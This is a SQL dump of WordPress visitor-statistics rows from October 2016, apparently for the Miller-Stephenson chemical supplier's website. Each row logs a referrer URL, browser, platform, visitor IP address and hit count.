INSERT INTO `wp_statistics_visitor` VALUES (4426, '2016-10-15', 'https://ttsgco.blogfa.com/', 'Firefox', 'Windows', '49.0', '', '107.182.230.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4427, '2016-10-15', 'https://australia-opening-times.com/', 'MSIE', 'Windows', '6.0', '', '46.211.197.241', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4428, '2016-10-15', 'https://www.google.co.za/', 'Chrome', 'Android', '52.0.2743.98', '', '165.255.115.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4429, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4430, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '47.0', '', '74.74.235.100', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4431, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '49.0', '', '173.245.202.153', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4432, '2016-10-15', 'https://www.bing.com/search?&q=+49%20oil%20machineries%20manufacturing%20companies%20contact%20email%20mail&scope=web&setmkt=sv-SE&setlang=match&first=481', 'MSIE', 'Windows', '11.0', '', '192.168.100.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4433, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '176.58.115.37', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4434, '2016-10-15', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Firefox', 'Windows', '44.0', '', '199.168.97.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4435, '2016-10-15', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '48.0.2564.109', '', '199.168.97.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4436, '2016-10-15', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '48.0.2564.97', '', '199.168.97.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4437, '2016-10-15', 'https://50.62.30.35/phpmyadmin/index.php', 'MSIE', 'Windows', '9.0', '', '27.199.135.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4438, '2016-10-15', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '207.107.0.161', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4439, '2016-10-15', 'https://x-lime.net/', 'Unknown', 'Unknown', 'Unknown', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4440, '2016-10-15', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '8.0', '', '66.66.19.233', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4441, '2016-10-15', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '66.130.4.18', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4442, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '91.121.161.167', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4443, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.93', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4444, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.123', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4445, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4446, '2016-10-15', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '68.118.11.209', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4447, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.225', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4448, '2016-10-15', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '48.0.2564.116', '', '199.168.97.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4449, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '71.238.127.62', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4450, '2016-10-15', 'https://www.miller-stephenson.com/military-specs--nsn/', 'Chrome', 'Windows', '47.0.2526.111', '', '146.185.223.45', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4451, '2016-10-15', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.3', '', '73.38.250.160', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4452, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '46.183.221.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4453, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4454, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4455, '2016-10-15', 'https://realmonte.net/', 'Opera', 'Windows', '7.60', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4456, '2016-10-15', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '24.4.121.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4457, '2016-10-15', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '74.12.0.231', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4458, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '47.0', '', '24.193.212.151', '000', 754, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4459, '2016-10-15', 'https://www.directindustry.com/prod/miller-stephenson-chemical-co/product-173822-1749801.html', 'Firefox', 'Windows', '49.0', '', '36.70.229.163', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4460, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4461, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.163', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4462, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4463, '2016-10-15', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '108.63.20.76', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4464, '2016-10-15', 'https://7fon.ru/', 'Opera', 'Windows', '8.00', '', '46.118.118.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4465, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '4.0', '', '107.170.107.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4466, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '26.0.1410.65', '', '52.4.244.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4467, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4468, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '89.218.249.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4469, '2016-10-15', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.127.129', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4470, '2016-10-15', 'https://www.google.co.in/', 'Chrome', 'Windows', '54.0.2840.59', '', '49.207.190.210', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4471, '2016-10-15', 'https://www.brus.city/', 'Opera', 'Windows', '9.00', '', '37.115.187.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4472, '2016-10-15', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '107.3.95.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4473, '2016-10-15', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4474, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '2601:18a:c500:e8fd:2428:af3a:b39c:d90e', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4475, '2016-10-15', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '107.77.97.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4476, '2016-10-15', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.169.26.127', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4477, '2016-10-15', 'https://www.google.com.mx/', 'Chrome', 'Windows', '53.0.2785.143', '', '201.117.193.191', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4478, '2016-10-15', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CDQQFjAF&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fvazo_overview.html&ei=AmoCWKvDK-G5RPwg&usg=AFQjCNESI5yDu11sJVIRdHyRBsQiHWCyHw', 'MSIE', 'Windows', '11.0', '', '66.249.88.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4479, '2016-10-15', 'https://www.miller-stephenson.com/chemicals/vazo-radical-initiators/', 'MSIE', 'Windows', '11.0', '', '66.249.88.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4480, '2016-10-15', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '10.0', '', '174.199.12.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4481, '2016-10-15', 'https://www.miller-stephenson.com/chemicals/solvents/', 'Safari', 'iPhone', '7.0', '', '65.55.210.181', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4482, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '169.53.6.107', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4483, '2016-10-15', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4484, '2016-10-15', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.18.22.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4485, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4486, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4487, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '2.0.0.6', '', '54.71.173.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4488, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '23.0.1271.95', '', '54.91.16.247', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4489, '2016-10-15', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwiJxvibwN3PAhVGzGMKHepTA6cQFghYMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q&sig2=LTT0ezwvGXFq8oua6xrllQ&bvm=bv.135974163,d.cGc', 'MSIE', 'Windows', '11.0', '', '66.239.62.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4490, '2016-10-15', 'https://www.miller-stephenson.com', 'Python-urllib', 'Unknown', '2.7', '', '192.241.225.16', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4491, '2016-10-15', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '172.4.154.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4492, '2016-10-15', 'https://stairliftsarea.com/', 'Opera', 'Windows', '7.0', '', '46.118.155.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4493, '2016-10-15', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '64.33.142.143', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4494, '2016-10-15', 'https://r.search.yahoo.com/_ylt=A0LEV12oiwJYbnsAnmBXNyoA;_ylu=X3oDMTByaWg0YW05BGNvbG8DYmYxBHBvcwM4BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1476590632/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fconformal-coating%2f/RK=0/RS=u5uHlCIEncrpwM7jGDlPitPdbjs-', 'MSIE', 'Windows', '11.0', '', '76.17.168.232', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4495, '2016-10-15', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '166.137.10.48', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4496, '2016-10-15', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '42.236.10.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4497, '2016-10-15', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '67.191.250.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4498, '2016-10-15', 'https://www.miller-stephenson.com/miller/other_release_agents.html', 'MSIE', 'Windows', '9.0', '', '182.118.20.163', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4499, '2016-10-15', 'https://www.miller-stephenson.com/products/epon_epoxy_resins_modifiers__curing_agents.aspx', 'MSIE', 'Windows', '9.0', '', '182.118.22.229', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4500, '2016-10-15', 'https://www.miller-stephenson.com/products/epon_epoxy_resins_modifiers__curing_agents.aspx', 'MSIE', 'Windows', '9.0', '', '182.118.22.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4501, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4502, '2016-10-15', 'https://www.adsensecustomsearchads.com/afs/ads?q=CRC%205351%20Brake%20Caliper%20Synthetic%20Grease%2C%202.5%20Wt%20Oz&adpage=1&ccfn=amazon_detail_numbered_wide_15px_title&r=m&fexp=21404%2C7000108&client=amazon&channel=g-channel-44%2Bg-channel-223%2Bg-channel-120%2Bg-channel-346&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&jsei=4&format=n4&ad=n4&nocache=1921476564811555&num=0&output=uds_ads_only&v=3&bsl=10&u_his=4&u_tz=-240&dt=1476564811556&u_w=1536&u_h=864&biw=-12245933&bih=-12245933&isw=1488&ish=1&psw=1488&psh=0&frm=2&uio=uv3-&jsv=10306&rurl=httpss%3A%2F%2Fd14qd3he45186l.cloudfront.net%2Fads-search32.html&referer=www.amazon.com', 'Edge', 'Windows', '14.14393', '', '50.70.172.84', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4503, '2016-10-15', 'https://r.search.yahoo.com/_ylt=AwrSbgn0nQJYnW4Aub1XNyoA;_ylu=X3oDMTEyNHJmZWFuBGNvbG8DZ3ExBHBvcwMyBHZ0aWQDQjE4NzlfMQRzZWMDc3I-/RV=2/RE=1476595316/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproducts%2f/RK=0/RS=ngDQk9tMbStCbf3DuDSKXMMGeHk-', 'MSIE', 'Windows', '11.0', '', '130.76.186.13', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4504, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '26.0.1410.63', '', '185.7.213.12', '000', 28, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4505, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '36.0.1985.67', '', '185.7.213.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4506, '2016-10-15', 'https://www.miller-stephenson.com', 'Safari', 'Windows', '538.1', '', '41.33.248.226', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4507, '2016-10-15', 'https://www.google.nl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjF9oeA493PAhXFXRoKHZ1yAJsQFghCMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-828%2F&usg=AFQjCNG-ULz5hPi_elA0tDheufF5SIOMyg', 'MSIE', 'Windows', '11.0', '', '37.153.250.15', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4508, '2016-10-15', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '67.188.18.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4509, '2016-10-15', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.162.129.157', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4510, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '47.0', '', '24.162.129.157', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4511, '2016-10-15', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '9.0', '', '73.168.136.234', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4512, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '199.81.187.67', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4513, '2016-10-15', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4514, '2016-10-15', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '24.193.212.151', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4515, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.187.101.170', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4516, '2016-10-15', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '63.226.237.161', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4517, '2016-10-15', 'https://www.google.com/', 'Chrome', 'Macintosh', '49.0.2623.112', '', '70.190.1.84', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4518, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.101', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4519, '2016-10-15', 'https://www.bing.com/search?q=epikure+3140+vs+versamid+140&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4520, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4521, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4522, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '202.65.158.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4523, '2016-10-15', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '97.103.98.167', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4524, '2016-10-15', 'https://www.google.com/aclk?sa=L&ai=DChcSEwitpMDk993PAhUMGIEKHQ-4B94YABAG&sig=AOD64_0sGoAmqq9dHlgTB-S5k_tKjvFzTw&rct=j&q=&ved=0ahUKEwjDyrzk993PAhWHCD4KHU15A5kQ0QwI0wE&adurl=', 'MSIE', 'Windows', '11.0', '', '69.118.141.68', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4525, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4526, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '25.0', '', '10.15.112.233', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4527, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '3.6.8', '', '107.20.220.83', '000', 60, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4528, '2016-10-16', 'https://www.miller-stephenson.com/contact_us.aspx', 'MSIE', 'Windows', '9.0', '', '182.118.25.223', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4529, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.2', '', '174.31.59.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4530, '2016-10-16', 'https://www.google.com.au/', 'Chrome', 'Windows', '53.0.2785.143', '', '110.174.176.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4531, '2016-10-16', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '99.42.185.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4532, '2016-10-16', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '7.0', '', '157.55.2.180', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4533, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '176.58.115.37', '000', 33, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4534, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4535, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '166.137.125.88', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4536, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '15.0.1', '', '31.193.51.105', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4537, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '162.150.16.215', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4538, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4539, '2016-10-16', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '76.103.237.145', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4540, '2016-10-16', 'https://www.google.com/afs/ads?q=H2%20oil%20pan&oe=utf-8&lo=true&adpage=1&adrep=5&r=m&fexp=2631601%2C21404%2C7000108&client=comcastpc-experiments&channel=comcastpc_betac&hl=en&adtest=off&adsafe=low&type=0&ie=UTF-8&jsei=4&format=p5%7Cn5%7Cw3&ad=w3n5p5&nocache=5511476580239421&num=0&output=uds_ads_only&v=3&adlh=on&adext=as1%2Cl1%2Csr1&bsl=10&u_his=1&u_tz=-420&dt=1476580239423&u_w=1920&u_h=1080&biw=1920&bih=964&psw=1920&psh=623&frm=0&uio=uv3cs1as1sr1va1-sl1lo1lHaf3wi525st16sd13sv13sa13da1-sl1lo1lhaf3wi525st16sd13sv13sa13da1-sl0lo1lhaf3wi250st16sd13sv13sa13da0&jsv=10306&rurl=https%3A%2F%2Fsearch.xfinity.com%2F%23web%2FH2%2Boil%2Bpan&referer=https%3A%2F%2Fmy.xfinity.com%2F', 'Edge', 'Windows', '14.14393', '', '73.162.95.204', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4541, '2016-10-16', 'https://www.miller-stephenson.com/mold-release-agents/', 'Safari', 'iPad', '10.0', '', '24.193.212.151', '000', 31, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4542, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4543, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4544, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '202.156.146.56', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4545, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.198.192.35', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4546, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.0.7', '', '158.85.11.189', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4547, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.169.214.155', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4548, '2016-10-16', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '24.52.134.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4549, '2016-10-16', 'https://www.miller-stephenson.com/my-account/', 'Firefox', 'Windows', '47.0', '', '24.193.212.151', '000', 344, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4550, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '47.145.75.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4551, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '54.148.118.187', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4552, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.65.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4553, '2016-10-16', 'https://www.miller-stephenson.com/', 'Unknown', 'Unknown', 'Unknown', '', '184.168.224.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4554, '2016-10-16', 'https://www.miller-stephenson.com/', 'Unknown', 'Unknown', 'Unknown', '', '184.168.224.27', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4555, '2016-10-16', 'https://www.miller-stephenson.com/', 'Unknown', 'Unknown', 'Unknown', '', '184.168.224.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4556, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4557, '2016-10-16', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '24.176.234.6', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4558, '2016-10-16', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4559, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '74.91.26.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4560, '2016-10-16', 'https://www.miller-stephenson.com/', 'Firefox', 'Macintosh', '34.0', '', '192.126.162.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4561, '2016-10-16', 'https://www.miller-stephenson.com/news/', 'MSIE', 'Windows', '9.0', '', '182.118.20.235', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4562, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '50.86.48.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4563, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.150.255.6', '000', 1, 0); 
